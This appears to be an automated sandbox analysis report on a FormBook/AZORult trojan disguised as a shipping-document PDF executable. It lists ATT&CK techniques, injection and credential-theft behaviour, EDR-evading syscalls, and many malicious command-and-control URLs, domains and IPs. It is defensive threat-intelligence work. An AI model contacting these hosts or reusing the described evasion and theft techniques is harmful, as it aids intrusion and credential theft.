                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573434 Sample: SHIPPING DOCUMENTS_PDF.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 28 www.growbamboo.xyz 2->28 30 www.070001813.xyz 2->30 32 27 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 SHIPPING DOCUMENTS_PDF.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 pNkvbgLNQpIoyz.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 waitfor.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 pNkvbgLNQpIoyz.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 banajibazar.xyz 173.208.249.155, 49929, 49935, 49941 WIIUS United States 22->34 36 b1-3-r111.kunlundns.top 101.32.205.61, 50005, 50006, 50007 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SHIPPING DOCUMENTS_PDF.exe53%ReversingLabsWin32.Trojan.AZORult
                SHIPPING DOCUMENTS_PDF.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.070001813.xyz/gn0y/0%Avira URL Cloudsafe
                http://www.17jkgl.com/9lgl/?LDVlCz=NTK3NLhlAEJIOtoeBFtljOkEhfYZVbBGiOzAI1f+R144iBEE4BOnuC3DqsUysY3FH9LbQrV9xfPYm9YM/jyzxs8eKdKq7NnxOPLJXW8Qu/cpUMw46FhSxTz+BHey1p9/Wg==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/1250%Avira URL Cloudsafe
                http://www.17jkgl.com/9lgl/0%Avira URL Cloudsafe
                http://www.walkecode.top/qei1/0%Avira URL Cloudsafe
                http://www.thezensive.work/laeb/?LDVlCz=R1QkcJ3G5DA9kU07Q4bHZGXwpE7poG4obEoFTYXYr0KTY8cjuufgj2Wfg7CEtb/if9/3otTPHXcvO0KabB4WT9d0qR/eTQNYs+qdxysYlPDjIZ08l2KjBlYrb7eSynDgaw==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.rwse6wjx.sbs/n0se/0%Avira URL Cloudsafe
                http://www.growbamboo.xyz/1h7d/0%Avira URL Cloudsafe
                http://www.walkecode.top/qei1/?LDVlCz=nNC+GBX2ggWuM05tEEqRTuHIkAvcf+dXy/bvByniPoLRj52NglzWV1Nft7BNtL9++4tRfUwg9XmNi4A2kp9kOCOyWvDUT5wtJii7I2tTBBgakefdRMv39WDJ4M987EpnCg==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.thezensive.work/laeb/0%Avira URL Cloudsafe
                http://www.zrichiod-riech.sbs/26nq/0%Avira URL Cloudsafe
                http://www.primespot.live/icu6/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=762QZ2SV6NpjcpWEPp/HDXxWZXZX1W4w6TtwEwMqgABTEXEh+wW122QWjov6SciVl+aW6WWJfJ+5Cw+tTwbMJ19RlEhii/WIAwuvAuC5wag6L1em5+IXdi875fnKjGjeWw==0%Avira URL Cloudsafe
                http://www.ciemanr.quest/gejp/0%Avira URL Cloudsafe
                https://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7s0%Avira URL Cloudsafe
                http://www.zrichiod-riech.sbs0%Avira URL Cloudsafe
                http://www.ciemanr.quest/gejp/?LDVlCz=B8lENIMSkdQf4FGQc5K+k257k877TXD8FgVAfBzrbl9XXLWxyw5ahRnSZIhzPxA1TMan6vpZ6mPmpcnGRYODwaH5MOJowBwrmH/nBLcALJg/EQzrJ0QQeK+YBPbGWQ4zHw==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.hisako.shop/o4tj/0%Avira URL Cloudsafe
                http://www.zrichiod-riech.sbs/26nq/?LDVlCz=03R0/PY94GJRzPoOKSenb2h5QS/Kl50E/qK0YcgrJ8wpZCLSP+GtGIEwrkK3Oa2ONw/TguZq9BdWMDmUOrZ+COkHC5rjPuI42FsUNzu6Vv93haoOa+yyAoKItnrc6cGBtQ==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.activateya.life/f95q/0%Avira URL Cloudsafe
                http://www.070001813.xyz/gn0y/?LDVlCz=deG7RjeXnjjKJ6Ot/ZvT1ZCOdrvHxkgph9CMZ5BhYMmF8u0wO9qMaDcK53O3JwyOf3l+Oc7MzAVt2qPkHXgf7ZhvCL0D4R10rxSbaYIqOAV7xlWd89x6BKiu35RrP0Id3g==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.primespot.live/icu6/0%Avira URL Cloudsafe
                http://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.growbamboo.xyz/1h7d/?LDVlCz=GhVUl+BMvYJ5ZB/G+p82cySXkvn+9vYw5d6SxNhFTeZQzODCqlJRcn8j1xBkKA1XTq1Cn2kO8HKqHDF15Seo3gBfn1d442lRHkqyo3MG/ycD+W3sgPB+1QYdeAS4c5YMDQ==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.rwse6wjx.sbs/n0se/?LDVlCz=hkrsNdm9A7NEs6AELC9hc5Biy4ux3a/2UN9Ti/zPtL1d4UFJsQdYSGmB1x8mN1/no5/doAmWeXNISuQ7Z6M7ARUekuecQYjdGGqJoetNg5rktHF3zD1BwWzApk9VpjBEpg==&NdLhG=cLCtFnqPUvutTbuP0%Avira URL Cloudsafe
                http://www.activateya.life/f95q/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=kbZ+3TVQWfE7KiBcybfm9WvlwV1TJfIMHZM6kD8OpyCP9Gh7sWOPFpouLIgiGz3sUBqRfaXNkxnyQnhTpFi/D08FMGsEDjNddsm/ASVO0JLXKussNUmxA8HGD8mS8NlSug==0%Avira URL Cloudsafe
                http://www.emirates-visa.net/5cm4/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA==0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.zrichiod-riech.sbs
                		172.67.176.240
                		truetrue
                  		unknown
                  www.wtsshnm.top
                  		45.41.80.144
                  		truetrue
                    		unknown
                    emirates-visa.net
                    		3.33.130.190
                    		truetrue
                      		unknown
                      activateya.life
                      		84.32.84.32
                      		truetrue
                        		unknown
                        www.17jkgl.com
                        		38.6.78.235
                        		truetrue
                          		unknown
                          thezensive.netlify.app
                          		3.125.36.175
                          		truetrue
                            		unknown
                            rk.jingdong.skin
                            		150.109.11.247
                            		truetrue
                              		unknown
                              www.070001813.xyz
                              		161.97.142.144
                              		truetrue
                                		unknown
                                www.primespot.live
                                		209.74.79.42
                                		truetrue
                                  		unknown
                                  b1-3-r111.kunlundns.top
                                  		101.32.205.61
                                  		truetrue
                                    		unknown
                                    www.walkecode.top
                                    		124.71.162.21
                                    		truetrue
                                      		unknown
                                      dns.ladipage.com
                                      		18.139.62.226
                                      		truefalse
                                        		high
                                        banajibazar.xyz
                                        		173.208.249.155
                                        		truetrue
                                          		unknown
                                          www.rwse6wjx.sbs
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.activateya.life
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.thezensive.work
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.ciemanr.quest
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.emirates-visa.net
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.growbamboo.xyz
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.hisako.shop
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.17jkgl.com/9lgl/?LDVlCz=NTK3NLhlAEJIOtoeBFtljOkEhfYZVbBGiOzAI1f+R144iBEE4BOnuC3DqsUysY3FH9LbQrV9xfPYm9YM/jyzxs8eKdKq7NnxOPLJXW8Qu/cpUMw46FhSxTz+BHey1p9/Wg==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.thezensive.work/laeb/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.17jkgl.com/9lgl/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.growbamboo.xyz/1h7d/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.walkecode.top/qei1/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.thezensive.work/laeb/?LDVlCz=R1QkcJ3G5DA9kU07Q4bHZGXwpE7poG4obEoFTYXYr0KTY8cjuufgj2Wfg7CEtb/if9/3otTPHXcvO0KabB4WT9d0qR/eTQNYs+qdxysYlPDjIZ08l2KjBlYrb7eSynDgaw==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.walkecode.top/qei1/?LDVlCz=nNC+GBX2ggWuM05tEEqRTuHIkAvcf+dXy/bvByniPoLRj52NglzWV1Nft7BNtL9++4tRfUwg9XmNi4A2kp9kOCOyWvDUT5wtJii7I2tTBBgakefdRMv39WDJ4M987EpnCg==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.070001813.xyz/gn0y/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.rwse6wjx.sbs/n0se/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zrichiod-riech.sbs/26nq/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ciemanr.quest/gejp/?LDVlCz=B8lENIMSkdQf4FGQc5K+k257k877TXD8FgVAfBzrbl9XXLWxyw5ahRnSZIhzPxA1TMan6vpZ6mPmpcnGRYODwaH5MOJowBwrmH/nBLcALJg/EQzrJ0QQeK+YBPbGWQ4zHw==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.primespot.live/icu6/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=762QZ2SV6NpjcpWEPp/HDXxWZXZX1W4w6TtwEwMqgABTEXEh+wW122QWjov6SciVl+aW6WWJfJ+5Cw+tTwbMJ19RlEhii/WIAwuvAuC5wag6L1em5+IXdi875fnKjGjeWw==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.hisako.shop/o4tj/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.070001813.xyz/gn0y/?LDVlCz=deG7RjeXnjjKJ6Ot/ZvT1ZCOdrvHxkgph9CMZ5BhYMmF8u0wO9qMaDcK53O3JwyOf3l+Oc7MzAVt2qPkHXgf7ZhvCL0D4R10rxSbaYIqOAV7xlWd89x6BKiu35RrP0Id3g==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.activateya.life/f95q/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ciemanr.quest/gejp/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zrichiod-riech.sbs/26nq/?LDVlCz=03R0/PY94GJRzPoOKSenb2h5QS/Kl50E/qK0YcgrJ8wpZCLSP+GtGIEwrkK3Oa2ONw/TguZq9BdWMDmUOrZ+COkHC5rjPuI42FsUNzu6Vv93haoOa+yyAoKItnrc6cGBtQ==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.primespot.live/icu6/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.rwse6wjx.sbs/n0se/?LDVlCz=hkrsNdm9A7NEs6AELC9hc5Biy4ux3a/2UN9Ti/zPtL1d4UFJsQdYSGmB1x8mN1/no5/doAmWeXNISuQ7Z6M7ARUekuecQYjdGGqJoetNg5rktHF3zD1BwWzApk9VpjBEpg==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7sjiwZWkJjUpQH/sr9gZIVnDBJgsPBR+fKmpaKAjd6wyxi+eq8Hgh+Droj+Yb9QbnJwQg==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.growbamboo.xyz/1h7d/?LDVlCz=GhVUl+BMvYJ5ZB/G+p82cySXkvn+9vYw5d6SxNhFTeZQzODCqlJRcn8j1xBkKA1XTq1Cn2kO8HKqHDF15Seo3gBfn1d442lRHkqyo3MG/ycD+W3sgPB+1QYdeAS4c5YMDQ==&NdLhG=cLCtFnqPUvutTbuPtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.emirates-visa.net/5cm4/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.activateya.life/f95q/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=kbZ+3TVQWfE7KiBcybfm9WvlwV1TJfIMHZM6kD8OpyCP9Gh7sWOPFpouLIgiGz3sUBqRfaXNkxnyQnhTpFi/D08FMGsEDjNddsm/ASVO0JLXKussNUmxA8HGD8mS8NlSug==true
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabwaitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icowaitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=waitfor.exe, 00000005.00000002.4473892138.0000000005E0E000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.000000000372E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125waitfor.exe, 00000005.00000002.4473892138.00000000065E8000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.0000000003F08000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.zrichiod-riech.sbspNkvbgLNQpIoyz.exe, 00000006.00000002.4474990481.0000000004FFD000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ac.ecosia.org/autocomplete?q=waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwaitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.hisako.shop/o4tj/?LDVlCz=49GfoMoMEgfXZP1YCD85Y4F6kcmzgiifjOVZJgmdC9sULpLZnSwzXyHACQgjJ7swaitfor.exe, 00000005.00000002.4473892138.0000000006132000.00000004.10000000.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473478711.0000000003A52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=waitfor.exe, 00000005.00000003.2427298011.0000000007E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            3.125.36.175
                                                                            		thezensive.netlify.appUnited States
                                                                            		16509AMAZON-02UStrue
                                                                            161.97.142.144
                                                                            		www.070001813.xyzUnited States
                                                                            		51167CONTABODEtrue
                                                                            173.208.249.155
                                                                            		banajibazar.xyzUnited States
                                                                            		32097WIIUStrue
                                                                            209.74.79.42
                                                                            		www.primespot.liveUnited States
                                                                            		31744MULTIBAND-NEWHOPEUStrue
                                                                            101.32.205.61
                                                                            		b1-3-r111.kunlundns.topChina
                                                                            		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                            172.67.176.240
                                                                            		www.zrichiod-riech.sbsUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            18.139.62.226
                                                                            		dns.ladipage.comUnited States
                                                                            		16509AMAZON-02USfalse
                                                                            38.6.78.235
                                                                            		www.17jkgl.comUnited States
                                                                            		174COGENT-174UStrue
                                                                            150.109.11.247
                                                                            		rk.jingdong.skinSingapore
                                                                            		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                            84.32.84.32
                                                                            		activateya.lifeLithuania
                                                                            		33922NTT-LT-ASLTtrue
                                                                            3.33.130.190
                                                                            		emirates-visa.netUnited States
                                                                            		8987AMAZONEXPANSIONGBtrue
                                                                            124.71.162.21
                                                                            		www.walkecode.topChina
                                                                            		55990HWCSNETHuaweiCloudServicedatacenterCNtrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1573434
                                                                            Start date and time:2024-12-12 00:17:06 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 37s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:7
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:SHIPPING DOCUMENTS_PDF.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@17/12
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 90%
                                                                            • Number of executed functions: 45
                                                                            • Number of non-executed functions: 281
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • VT rate limit hit for: SHIPPING DOCUMENTS_PDF.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            18:18:53API Interceptor12687541x Sleep call for process: waitfor.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3.125.36.175http://vpnconsumer.comGet hashmaliciousUnknownBrowse
                                                                              https://www.tryinteract.com/share/quiz/673350c22861f600153c2f9cGet hashmaliciousUnknownBrowse
                                                                                Https://mt5-deriv-server-02.netlify.appGet hashmaliciousUnknownBrowse
                                                                                  161.97.142.144PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.070002018.xyz/6m2n/
                                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.070002018.xyz/6m2n/
                                                                                  Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.030002613.xyz/xd9h/
                                                                                  Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.030002449.xyz/cfqm/
                                                                                  PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                  • www.070001955.xyz/7zj0/
                                                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.54248711.xyz/jm2l/
                                                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.030002613.xyz/xd9h/
                                                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.070002018.xyz/6m2n/
                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.54248711.xyz/jm2l/
                                                                                  209.74.79.42Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.glowups.life/dheh/
                                                                                  72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.primespot.live/b8eq/
                                                                                  172.67.176.240XOED07456754893.BAT.exeGet hashmaliciousLokibotBrowse
                                                                                  • obilok.xyz/dx/77.php

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.17jkgl.comPre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 38.6.78.235
                                                                                  dns.ladipage.comCJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                  • 13.228.81.39
                                                                                  MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                                  • 13.228.81.39
                                                                                  QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                                  • 13.228.81.39
                                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • 54.179.173.60
                                                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 18.139.62.226
                                                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 13.228.81.39
                                                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                                                  • 18.139.62.226
                                                                                  wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                                  • 54.179.173.60
                                                                                  COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 18.139.62.226
                                                                                  Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 54.179.173.60
                                                                                  www.primespot.live72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.79.42
                                                                                  b1-3-r111.kunlundns.topZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 43.155.76.124
                                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 43.155.76.124
                                                                                  PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 43.155.76.124
                                                                                  3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                                  • 43.155.76.124
                                                                                  COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 43.155.76.124
                                                                                  QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                                  • 129.226.56.200
                                                                                  COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                                                  • 129.226.56.200
                                                                                  Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 129.226.56.200
                                                                                  thezensive.netlify.appSalmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 3.75.10.80

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  AMAZON-02USjew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 18.226.64.181
                                                                                  jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 52.52.10.186
                                                                                  jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 54.195.68.141
                                                                                  jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                  • 34.247.205.175
                                                                                  https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                  • 13.227.9.227
                                                                                  x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                  • 100.20.19.195
                                                                                  i686.elfGet hashmaliciousMiraiBrowse
                                                                                  • 18.240.63.133
                                                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 18.196.227.86
                                                                                  main_arm5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 34.249.145.219
